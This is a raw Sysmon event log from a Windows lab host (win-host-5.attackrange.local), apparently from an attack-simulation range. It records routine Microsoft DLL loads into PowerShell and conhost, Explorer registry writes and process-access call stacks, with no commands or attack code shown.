13241300x80000000000000001529954Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.447{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000804FC\VirtualDesktopBinary Data 
12241200x80000000000000001529953Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.447{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000804FC 734700x80000000000000001529952Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.447{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 13241300x80000000000000001529951Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.447{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000120618\VirtualDesktopBinary Data 12241200x80000000000000001529950Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.447{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000120618 734700x80000000000000001529949Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft 
Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x80000000000000001529948Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001529947Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001529946Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001529945Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client 
DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001529944Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001529943Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001529942Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001529941Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001529940Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001529939Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\atl.dll3.05.2284ATL Module for Windows XP (Unicode)Microsoft (R) Visual C++Microsoft CorporationATL.DLLMD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560DtrueMicrosoft WindowsValid 734700x80000000000000001529938Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 
734700x80000000000000001529937Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001529936Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001529935Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001529934Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft 
Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 13241300x80000000000000001529933Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.431{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001529932Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.431{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15Binary Data 10341000x80000000000000001529931Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529930Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.431{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529929Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529928Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.431{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529927Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.431{21761711-84C8-607D-EE00-00000000BB01}32603680C:\Windows\system32\taskhostw.exe{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529926Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529925Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValid 10341000x80000000000000001529924Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001529923Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001529922Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x80000000000000001529921Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529920Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37843536C:\Windows\Explorer.EXE{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529919Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529918Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529917Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001529916Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:08.415{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529915Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=74621C6ABE4E9A568DF0A38E7282D71E,SHA256=0788A092D47800D0EB120A7DBB9E59234D0722A4A2E80ECE6CE70E3A84A3750AtrueMicrosoft WindowsValid 734700x80000000000000001529914Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\msctf.dll10.0.14393.4225 (rs1_release.210127-1811)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=1FD254D30743876981194F7E17ECDB6F,SHA256=0CB67AC140097A888B7ED85C9A31F8967D16661B82557CE5D61FA70A85BDF8B8trueMicrosoft WindowsValid 10341000x80000000000000001529913Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-83AE-607D-1600-00000000BB01}11084896C:\Windows\system32\svchost.exe{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001529912Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-83AE-607D-1600-00000000BB01}11081152C:\Windows\system32\svchost.exe{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001529911Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x80000000000000001529910Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000001529909Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001529908Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.415{21761711-6120-6080-BC5D-00000000BB01}2852C:\Windows\System32\conhost.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x80000000000000001529907Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 